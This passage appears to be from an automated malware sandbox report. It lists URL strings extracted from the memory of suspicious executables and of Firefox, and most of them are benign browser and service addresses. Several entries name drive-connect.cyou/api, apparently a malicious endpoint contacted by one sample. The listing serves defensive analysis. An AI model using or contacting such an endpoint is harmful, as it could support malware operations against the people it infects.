                          Source: d0d9725343.exe, 0000000B.00000003.3004420814.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2979921174.00000000037B1000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3168094376.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3380329645.00000214A6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: firefox.exe, 0000001D.00000002.3377707348.000002149B530000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3377707348.000002149B511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
                          Source: firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
                          Source: d0d9725343.exe, 0000000B.00000003.3092697959.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3004391894.000000000103D000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093376280.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/
                          Source: d0d9725343.exe, 0000000B.00000003.3092005941.000000000103D000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093560739.000000000103D000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3004391894.000000000103D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/&
                          Source: d0d9725343.exe, 0000000B.00000003.3092697959.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093609447.0000000001053000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093376280.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api
                          Source: d0d9725343.exe, 0000000B.00000003.3024651341.0000000001048000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3024558642.0000000001053000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093609447.0000000001053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api$
                          Source: d0d9725343.exe, 0000000B.00000003.3004292133.0000000001053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiz
                          Source: d0d9725343.exe, 0000000B.00000003.2952421698.0000000003849000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3024706860.000000000385D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou:443/api
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3398914438.00000214AAC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?t=ffab&q=
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/y
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://ebay.com
                          Source: firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebay.comP
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%ssetSlowScriptDebugHandler/debugService.activationH
                          Source: firefox.exe, 0000001D.00000002.3442726709.00000214B3C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://fb.me/react-polyfillsO
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://fb.me/react-polyfillsP
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://fb.me/react-polyfillsPO
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/74f06853-c80d-4afc-9b2
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
                          Source: firefox.exe, 0000001D.00000002.3420072274.00000214AD8DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404491344.00000214AB740000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsUpdat
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsUpdat
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1_onDisplaySyncURIs/allKnownSender
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
                          Source: firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3454872556.00001A5334604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://getpocket.com/
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://getpocket.com/a4
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://getpocket.com/collections
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://getpocket.com/explore/
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabSends
                          Source: firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morediscoverystream.endpointSpocsClear
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morediscoverystream.personalization.modelKeys
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://getpocket.com/read/$
                          Source: firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                          Source: firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsresource://gre/modules/Region.sys.mjsresource://gre/modules/App
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: firefox.exe, 0000001D.00000002.3414473910.00000214AC811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/cfworker
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/cfworker__absolute_recursive_ref__isPotentiallyVulnerablePassword
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
                          Source: firefox.exe, 0000001D.00000002.3431199683.00000214AF1C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 0000001D.00000002.3431199683.00000214AF1C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/issues/1266
                          Source: firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsresource://pdf.js/
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla/webcompat-reporter
                          Source: firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpString found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
                          Source: firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.mdexperimental-features
